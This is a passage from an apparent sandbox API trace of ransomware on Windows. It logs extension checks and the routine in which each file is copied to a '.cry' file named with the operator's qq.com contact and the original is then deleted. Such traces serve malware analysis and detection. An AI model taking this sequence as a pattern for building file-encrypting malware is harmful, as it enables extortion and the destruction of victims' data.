lpString2=".PNG") returned 1 [0047.761] lstrlenW (lpString=".bz2") returned 4 [0047.761] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.761] lstrlenW (lpString=".7z") returned 3 [0047.761] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.761] lstrlenW (lpString=".dbf") returned 4 [0047.761] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.761] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.762] lstrlenW (lpString=".1cd") returned 4 [0047.762] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.762] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.762] lstrlenW (lpString=".jpg") returned 4 [0047.762] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.764] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0047.764] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.764] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0047.765] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=34163) returned 1 [0047.765] CloseHandle (hObject=0x1bc) returned 1 [0047.765] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png")) returned 0x20 [0047.765] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0047.765] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0047.765] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.765] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.765] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0047.765] GetLastError () returned 0x0 [0047.765] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x8573, lpOverlapped=0x0) returned 1 [0047.785] WriteFile (in: hFile=0x224, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x8580, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x8580, lpOverlapped=0x0) returned 1 [0047.787] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.787] WriteFile (in: hFile=0x224, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.787] SetEndOfFile (hFile=0x224) returned 1 [0047.787] CloseHandle (hObject=0x224) returned 1 [0047.787] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.787] SetEndOfFile (hFile=0x1bc) returned 1 [0047.788] CloseHandle (hObject=0x1bc) returned 1 [0047.788] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0047.788] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png")) returned 1 [0047.788] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.788] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.788] lstrlenW (lpString=".doc") returned 4 [0047.789] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.789] lstrlenW (lpString=".docx") returned 5 [0047.789] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.789] lstrlenW (lpString=".pdf") returned 4 [0047.789] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.789] lstrlenW (lpString=".xls") returned 4 [0047.789] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.789] lstrlenW (lpString=".xlsx") returned 5 [0047.789] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.789] lstrlenW (lpString=".ppt") returned 4 [0047.789] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.789] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.789] lstrlenW (lpString=".zip") returned 4 [0047.789] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.789] lstrlenW (lpString=".rar") returned 4 [0047.789] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.789] lstrlenW (lpString=".bz2") returned 4 [0047.789] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.789] lstrlenW (lpString=".7z") returned 3 [0047.789] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.789] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.789] lstrlenW (lpString=".dbf") returned 4 [0047.789] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.789] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.789] lstrlenW (lpString=".1cd") returned 4 [0047.789] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.789] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.789] lstrlenW (lpString=".jpg") returned 4 [0047.789] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.790] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.790] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.790] lstrlenW (lpString=".doc") returned 4 [0047.790] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.790] lstrlenW (lpString=".docx") returned 5 [0047.790] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.790] lstrlenW (lpString=".pdf") returned 4 [0047.790] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.790] lstrlenW (lpString=".xls") returned 4 [0047.790] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.790] lstrlenW (lpString=".xlsx") returned 5 [0047.790] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.790] lstrlenW (lpString=".ppt") returned 4 [0047.790] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.790] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.790] lstrlenW (lpString=".zip") returned 4 [0047.790] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.790] lstrlenW (lpString=".rar") returned 4 [0047.790] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.790] lstrlenW (lpString=".bz2") returned 4 [0047.790] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.790] lstrlenW (lpString=".7z") returned 3 [0047.790] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.790] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.790] lstrlenW (lpString=".dbf") returned 4 [0047.790] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.790] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.790] lstrlenW (lpString=".1cd") returned 4 [0047.790] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.790] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.790] lstrlenW (lpString=".jpg") returned 4 [0047.790] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.790] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0047.790] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.791] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0047.791] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1009) returned 1 [0047.791] CloseHandle (hObject=0x1bc) returned 1 [0047.792] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif")) returned 0x20 [0047.792] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0047.792] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0047.792] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.792] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.792] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0047.809] GetLastError () returned 0x0 [0047.809] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x3f1, lpOverlapped=0x0) returned 1 [0047.884] WriteFile (in: hFile=0x218, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x400, lpOverlapped=0x0) returned 1 [0047.885] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.885] WriteFile (in: hFile=0x218, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.885] SetEndOfFile (hFile=0x218) returned 1 [0047.886] CloseHandle (hObject=0x218) returned 1 [0047.886] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.886] SetEndOfFile (hFile=0x1bc) returned 1 [0047.886] CloseHandle (hObject=0x1bc) returned 1 [0047.886] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0047.887] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\slate\\preview.gif")) returned 1 [0047.887] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.887] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.887] lstrlenW (lpString=".doc") returned 4 [0047.887] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.887] lstrlenW (lpString=".docx") returned 5 [0047.887] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.887] lstrlenW (lpString=".pdf") returned 4 [0047.887] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.887] lstrlenW (lpString=".xls") returned 4 [0047.887] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.887] lstrlenW (lpString=".xlsx") returned 5 [0047.887] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.887] lstrlenW (lpString=".ppt") returned 4 [0047.887] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.887] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.887] lstrlenW (lpString=".zip") returned 4 [0047.887] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.887] lstrlenW (lpString=".rar") returned 4 [0047.887] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.887] lstrlenW (lpString=".bz2") returned 4 [0047.887] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.887] lstrlenW (lpString=".7z") returned 3 [0047.887] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.887] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.888] lstrlenW (lpString=".dbf") returned 4 [0047.888] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.888] lstrlenW (lpString=".1cd") returned 4 [0047.888] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.888] lstrlenW (lpString=".jpg") returned 4 [0047.888] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.888] lstrlenW (lpString=".doc") returned 4 [0047.888] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.888] lstrlenW (lpString=".docx") returned 5 [0047.888] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.888] lstrlenW (lpString=".pdf") returned 4 [0047.888] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.888] lstrlenW (lpString=".xls") returned 4 [0047.888] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.888] lstrlenW (lpString=".xlsx") returned 5 [0047.888] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.888] lstrlenW (lpString=".ppt") returned 4 [0047.888] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.888] lstrlenW (lpString=".zip") returned 4 [0047.888] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.888] lstrlenW (lpString=".rar") returned 4 [0047.888] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.888] lstrlenW (lpString=".bz2") returned 4 [0047.888] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.888] lstrlenW (lpString=".7z") returned 3 [0047.888] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.888] lstrlenW (lpString=".dbf") returned 4 [0047.888] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.888] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.888] lstrlenW (lpString=".1cd") returned 4 [0047.889] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.889] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 73 [0047.889] lstrlenW (lpString=".jpg") returned 4 [0047.889] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.889] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0047.889] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.889] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0047.889] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=2209) returned 1 [0047.889] CloseHandle (hObject=0x1bc) returned 1 [0047.889] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif")) returned 0x20 [0047.889] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0047.889] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0047.889] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.889] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.890] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224 [0048.152] GetLastError () returned 0x0 [0048.153] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x8a1, lpOverlapped=0x0) returned 1 [0048.223] WriteFile (in: hFile=0x224, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x8b0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x8b0, lpOverlapped=0x0) returned 1 [0048.228] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.228] WriteFile (in: hFile=0x224, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.228] SetEndOfFile (hFile=0x224) returned 1 [0048.228] CloseHandle (hObject=0x224) returned 1 [0048.228] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.228] SetEndOfFile (hFile=0x1bc) returned 1 [0048.229] CloseHandle (hObject=0x1bc) returned 1 [0048.229] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0048.229] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sonora\\preview.gif")) returned 1 [0048.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.229] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.229] lstrlenW (lpString=".doc") returned 4 [0048.229] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.229] lstrlenW (lpString=".docx") returned 5 [0048.230] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.230] lstrlenW (lpString=".pdf") returned 4 [0048.230] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.230] lstrlenW (lpString=".xls") returned 4 [0048.230] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.230] lstrlenW (lpString=".xlsx") returned 5 [0048.230] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.230] lstrlenW (lpString=".ppt") returned 4 [0048.230] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.230] lstrlenW (lpString=".zip") returned 4 [0048.230] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.230] lstrlenW (lpString=".rar") returned 4 [0048.230] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.230] lstrlenW (lpString=".bz2") returned 4 [0048.230] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.230] lstrlenW (lpString=".7z") returned 3 [0048.230] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.230] lstrlenW (lpString=".dbf") returned 4 [0048.230] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.230] lstrlenW (lpString=".1cd") returned 4 [0048.230] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.230] lstrlenW (lpString=".jpg") returned 4 [0048.230] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.230] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.230] lstrlenW (lpString=".doc") returned 4 [0048.230] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.230] lstrlenW (lpString=".docx") returned 5 [0048.230] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.230] lstrlenW (lpString=".pdf") returned 4 [0048.230] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.230] lstrlenW (lpString=".xls") returned 4 [0048.230] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.230] lstrlenW (lpString=".xlsx") returned 5 [0048.230] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.231] lstrlenW (lpString=".ppt") returned 4 [0048.231] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.231] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.231] lstrlenW (lpString=".zip") returned 4 [0048.231] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.231] lstrlenW (lpString=".rar") returned 4 [0048.231] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.231] lstrlenW 